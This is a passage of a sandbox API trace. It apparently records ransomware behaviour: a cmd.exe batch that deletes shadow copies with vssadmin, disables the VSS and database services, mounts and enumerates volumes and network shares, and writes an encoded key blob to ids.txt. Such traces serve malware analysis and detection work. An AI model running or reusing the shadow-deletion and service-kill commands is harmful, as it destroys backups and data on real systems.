[0032.584] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0xafe030 | out: lpFileInformation=0xafe030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708dd01f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x708dd01f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x708dd01f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x38a00)) returned 1 [0032.584] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73048 | out: hHeap=0xc50000) returned 1 [0032.584] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x388) returned 0xc7b030 [0032.584] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x144) returned 0xc610b0 [0032.584] GetLastError () returned 0x0 [0032.584] SetLastError (dwErrCode=0x0) [0032.584] CreateProcessA (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xafdfec*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x144, lpReserved2=0xc610b0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xafe030 | out: lpCommandLine="C:\\WINDOWS\\system32\\cmd.exe /c @echo off\r\nsc config browser\r\nsc config browser start=enabled\r\nvssadmin delete shadows /all /quiet\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n", lpProcessInformation=0xafe030*(hProcess=0x24c, hThread=0x248, dwProcessId=0xc04, dwThreadId=0x6d8)) returned 1 [0032.801] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0xffffffff) returned 0x0 [0037.140] GetExitCodeProcess (in: hProcess=0x24c, lpExitCode=0xafe050 | out: lpExitCode=0xafe050*=0x0) returned 1 [0037.140] CloseHandle (hObject=0x248) returned 1 [0037.140] CloseHandle (hObject=0x24c) returned 1 [0037.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc610b0 | out: hHeap=0xc50000) returned 1 [0037.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7b030 | out: hHeap=0xc50000) returned 1 [0037.140] GetLastError () returned 0x0 [0037.140] SetLastError (dwErrCode=0x0) [0037.140] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc6fb00 | out: hHeap=0xc50000) returned 1 [0037.140] FindFirstVolumeW (in: lpszVolumeName=0xafdec0, cchBufferLength=0x104 | out: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\") returned 0xc610b0 [0037.140] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\", lpszVolumePathNames=0xafdcb8, cchBufferLength=0x104, lpcchReturnLength=0xafdcb4 | out: lpszVolumePathNames=0xafdcb8, lpcchReturnLength=0xafdcb4) returned 1 [0037.140] FindNextVolumeW (in: hFindVolume=0xc610b0, lpszVolumeName=0xafdec0, cchBufferLength=0x104 | out: hFindVolume=0xc610b0, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0037.140] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\", lpszVolumePathNames=0xafdcb8, cchBufferLength=0x104, lpcchReturnLength=0xafdcb4 | out: lpszVolumePathNames=0xafdcb8, lpcchReturnLength=0xafdcb4) returned 1 [0037.141] SetVolumeMountPointW (lpszVolumeMountPoint="z:\\", lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0037.142] FindNextVolumeW (in: hFindVolume=0xc610b0, lpszVolumeName=0xafdec0, cchBufferLength=0x104 | out: hFindVolume=0xc610b0, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 0 [0037.142] FindVolumeClose (hFindVolume=0xc610b0) returned 1 [0037.142] GetLogicalDriveStringsW (in: nBufferLength=0x100, lpBuffer=0xaffa08 | out: lpBuffer="C:\\") returned 0x8 [0037.142] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66820 [0037.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6) returned 0xc752c8 [0037.142] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc66828 | out: ListHead=0xc66808, ListEntry=0xc66828) returned 0x0 [0037.142] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x3 [0037.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66840 [0037.142] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6) returned 0xc75298 [0037.142] RtlInterlockedPushEntrySList (in: ListHead=0xc66808, ListEntry=0xc66848 | out: ListHead=0xc66808, ListEntry=0xc66848) returned 0xc66828 [0037.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1fc20, lpParameter=0xc70780, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x24c [0037.143] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0xafe0c8 | out: lphEnum=0xafe0c8*=0xc72e08) returned 0x0 [0037.915] WNetEnumResourceW (in: hEnum=0xc72e08, lpcCount=0xafe0cc, lpBuffer=0xc7dd38, lpBufferSize=0xafe0d0 | out: lpcCount=0xafe0cc, lpBuffer=0xc7dd38, lpBufferSize=0xafe0d0) returned 0x0 [0037.915] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0xc7dd38, lphEnum=0xafe09c | out: lphEnum=0xafe09c*=0xc666c0) returned 0x0 [0037.917] WNetEnumResourceW (in: hEnum=0xc666c0, lpcCount=0xafe0a0, lpBuffer=0xc82160, lpBufferSize=0xafe0a4 | out: lpcCount=0xafe0a0, lpBuffer=0xc82160, lpBufferSize=0xafe0a4) returned 0x103 [0037.917] WNetCloseEnum (hEnum=0xc666c0) returned 0x0 [0037.917] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0xc7dd58, lphEnum=0xafe09c | out: lphEnum=0xafe09c*=0xc666c0) returned 0x4b8 [0053.095] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0xc7dd78, lphEnum=0xafe09c | out: lphEnum=0xafe09c*=0xc666c0) returned 0x4c6 [0053.103] WNetEnumResourceW (in: hEnum=0xc72e08, lpcCount=0xafe0cc, lpBuffer=0xc7dd38, lpBufferSize=0xafe0d0 | out: lpcCount=0xafe0cc, lpBuffer=0xc7dd38, lpBufferSize=0xafe0d0) returned 0x103 [0053.103] WNetCloseEnum (hEnum=0xc72e08) returned 0x0 [0053.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1fc20, lpParameter=0xc70d68, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2a8 [0053.104] WaitForMultipleObjects (nCount=0x2, lpHandles=0xafe1a0*=0x24c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x2ac Thread: id = 10 os_tid = 0xd10 [0037.662] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= ") returned 1047 [0037.662] lstrcatA (in: lpString1="", lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0037.662] lstrcatA (in: lpString1="\r\n", lpString2="local" | out: lpString1="\r\nlocal") returned="\r\nlocal" [0037.662] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= \r\nlocal") returned 1054 [0037.662] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0xc66848 [0037.662] lstrcpynW (in: lpString1=0x2aaed98, lpString2="Z:", iMaxLength=2048 | out: lpString1="Z:") returned="Z:" [0037.662] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75298 | out: hHeap=0xc50000) returned 1 [0037.662] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66840 | out: hHeap=0xc50000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6fab0 [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66840 [0037.663] RtlInitializeSListHead (in: ListHead=0xc66848 | out: ListHead=0xc66848) [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66500 [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6) returned 0xc75298 [0037.663] RtlInterlockedPushEntrySList (in: ListHead=0xc66848, ListEntry=0xc66508 | out: ListHead=0xc66848, ListEntry=0xc66508) returned 0x0 [0037.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6fab0, dwCreationFlags=0x4, lpThreadId=0xc6fab8 | out: lpThreadId=0xc6fab8*=0xdcc) returned 0x260 [0037.663] lstrlenW (lpString="Z:") returned 2 [0037.663] wsprintfA (in: param_1=0x2aae9b6, param_2="\r\n%S" | out: param_1="\r\nZ:") returned 4 [0037.663] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= \r\nlocal\r\nZ:") returned 1058 [0037.663] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0xc66828 [0037.663] lstrcpynW (in: lpString1=0x2aaed98, lpString2="C:", iMaxLength=2048 | out: lpString1="C:") returned="C:" [0037.663] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc752c8 | out: hHeap=0xc50000) returned 1 [0037.663] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66820 | out: hHeap=0xc50000) returned 1 [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6f970 [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66820 [0037.663] RtlInitializeSListHead (in: ListHead=0xc66828 | out: ListHead=0xc66828) [0037.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66580 [0037.664] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x6) returned 0xc75308 [0037.664] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66588 | out: ListHead=0xc66828, ListEntry=0xc66588) returned 0x0 [0037.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6f970, dwCreationFlags=0x4, lpThreadId=0xc6f978 | out: lpThreadId=0xc6f978*=0xfa8) returned 0x264 [0037.664] lstrlenW (lpString="C:") returned 2 [0037.664] wsprintfA (in: param_1=0x2aae9ba, param_2="\r\n%S" | out: param_1="\r\nC:") returned 4 [0037.664] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= \r\nlocal\r\nZ:\r\nC:") returned 1062 [0037.664] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0x0 [0037.664] lstrcatA (in: lpString1="", lpString2="\r\n\r\n" | out: lpString1="\r\n\r\n") returned="\r\n\r\n" [0037.664] lstrlenA (lpString="a0 4V dp nm e7 7W Ey gE dV 9i ic Zb au WZ my rm\r\nCd 19 3r AN k0 3D 2P LS Rx 6n rJ N8 TT 9v Wj GN\r\ndO l/ Tl Ds Bk QE 3q hn 58 yr Xg sN A1 eq 93 ki\r\noN vX pz 04 c1 eh Vl RF ot Xw 04 Lj /f qC rB 5P\r\nnu Wm aZ vl 5i nK 51 ON 1I Xz hM Hm p0 Vo zQ UR\r\n2d FC 2d Jo Dy fp KS ub Tp +w NK or 9V Fg xI 7f\r\nEf qM N8 3J 1T 8+ DD Gc EX cO 9t Dp KG PK Ib gd\r\nvU 5C qf 5k iv EE 6q 8t vk 2r WR K/ rT 4d xS KW\r\nBP zZ m3 Bt LD 1z In Mg 4l 3T br 9b Ht OJ 5Y Wf\r\nT+ D6 q7 +d pZ o6 aJ TO Ny cF qx aM lT GX 6s KR\r\nG8 yN uk BR 82 5E SK b2 B9 Qv Jn jq 2O hl I6 bj\r\nAO rC AM zM 00 HV 6D Ar 7m dc HI zQ rT hm qM KD\r\nQu NB gt hX 4g 8S 47 tc 0Y KP v0 sf +G Wm sm CV\r\nH4 5f cM qi /+ gt XB 0X 77 n0 vI Nv Lg fK AA dx\r\nRJ 3I uf RX yF O3 kU El hD 1v f6 jj Bh b9 kq aJ\r\nKe Wo qh K1 zI Rp sz 7i uV 57 Px Ce G2 P2 Ir GA\r\nOw mo GT AB OZ h1 nV mv tj Aw vo Cf Vp kx Kl EW\r\n+i N0 oo d2 33 LH BP Xn Ht lv mA iP kN fG kV kK\r\nen rK fv ln N0 Yd Bd di 51 sb d6 oX sC hv 71 Xw\r\nFk RE X1 vl yY YR L5 zm 1Y KY lN Q6 Qk K5 Ps Ss\r\n02 8y Pq 8Y Ve 4r eQ vY sZ H8 +M 9V U9 Qm Ih 4X\r\nyQ 4n 9T NS sl s= \r\nlocal\r\nZ:\r\nC:\r\n\r\n") returned 1066 [0037.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x268 [0037.665] SetFilePointer (in: hFile=0x268, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0037.665] WriteFile (in: hFile=0x268, lpBuffer=0x2aae598*, nNumberOfBytesToWrite=0x42a, lpNumberOfBytesWritten=0x2aae52c, lpOverlapped=0x0 | out: lpBuffer=0x2aae598*, lpNumberOfBytesWritten=0x2aae52c*=0x42a, lpOverlapped=0x0) returned 1 [0037.668] CloseHandle (hObject=0x268) returned 1 [0037.669] ResumeThread (hThread=0x260) returned 0x1 [0037.669] ResumeThread (hThread=0x264) returned 0x1 [0037.669] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc707a4*=0x260, bWaitAll=0, dwMilliseconds=0x2710) returned 0x0 [0038.083] CloseHandle (hObject=0x260) returned 1 [0038.084] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0xc66508 [0038.084] lstrcpynW (in: lpString1=0x2aaed98, lpString2="Z:\\Recovery", iMaxLength=2048 | out: lpString1="Z:\\Recovery") returned="Z:\\Recovery" [0038.084] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663c0 | out: hHeap=0xc50000) returned 1 [0038.084] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66500 | out: hHeap=0xc50000) returned 1 [0038.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6f470 [0038.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66460 [0038.084] RtlInitializeSListHead (in: ListHead=0xc66468 | out: ListHead=0xc66468) [0038.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0038.084] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x18) returned 0xc66500 [0038.084] RtlInterlockedPushEntrySList (in: ListHead=0xc66468, ListEntry=0xc66548 | out: ListHead=0xc66468, ListEntry=0xc66548) returned 0x0 [0038.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6f470, dwCreationFlags=0x0, lpThreadId=0xc6f478 | out: lpThreadId=0xc6f478*=0xf9c) returned 0x260 [0038.096] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0038.170] CloseHandle (hObject=0x260) returned 1 [0038.170] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0xc66448 [0038.170] lstrcpynW (in: lpString1=0x2aaed98, lpString2="Z:\\Recovery\\WindowsRE", iMaxLength=2048 | out: lpString1="Z:\\Recovery\\WindowsRE") returned="Z:\\Recovery\\WindowsRE" [0038.170] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc67598 | out: hHeap=0xc50000) returned 1 [0038.170] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66440 | out: hHeap=0xc50000) returned 1 [0038.170] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6f5d8 [0038.170] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0038.170] RtlInitializeSListHead (in: ListHead=0xc66448 | out: ListHead=0xc66448) [0038.170] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0038.170] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2c) returned 0xc678e0 [0038.170] RtlInterlockedPushEntrySList (in: ListHead=0xc66448, ListEntry=0xc664c8 | out: ListHead=0xc66448, ListEntry=0xc664c8) returned 0x0 [0038.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6f5d8, dwCreationFlags=0x0, lpThreadId=0xc6f5e0 | out: lpThreadId=0xc6f5e0*=0xf7c) returned 0x260 [0038.171] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0041.352] CloseHandle (hObject=0x260) returned 1 [0041.354] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0xc666c8 [0041.354] lstrcpynW (in: lpString1=0x2aaed98, lpString2="C:\\Windows10Upgrade\\2052", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\2052") returned="C:\\Windows10Upgrade\\2052" [0041.354] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72f88 | out: hHeap=0xc50000) returned 1 [0041.354] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0041.354] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x20) returned 0xc6f718 [0041.354] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665a0 [0041.354] RtlInitializeSListHead (in: ListHead=0xc665a8 | out: ListHead=0xc665a8) [0041.354] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc663a0 [0041.354] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x32) returned 0xc72f08 [0041.354] RtlInterlockedPushEntrySList (in: ListHead=0xc665a8, ListEntry=0xc663a8 | out: ListHead=0xc665a8, ListEntry=0xc663a8) returned 0x0 [0041.354] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1f500, lpParameter=0xc6f718, dwCreationFlags=0x0, lpThreadId=0xc6f720 | out: lpThreadId=0xc6f720*=0xee8) returned 0x260 [0041.355] WaitForMultipleObjects (nCount=0x2, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0041.440] CloseHandle (hObject=0x260) returned 1 [0041.440] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: ListHead=0xc66808) returned 0x0 [0041.440] WaitForMultipleObjects (nCount=0x1, lpHandles=0xc707a4*=0x264, bWaitAll=0, dwMilliseconds=0x2710) returned 0x102 [0051.508] RtlInterlockedPopEntrySList (in: ListHead=0xc66808 | out: 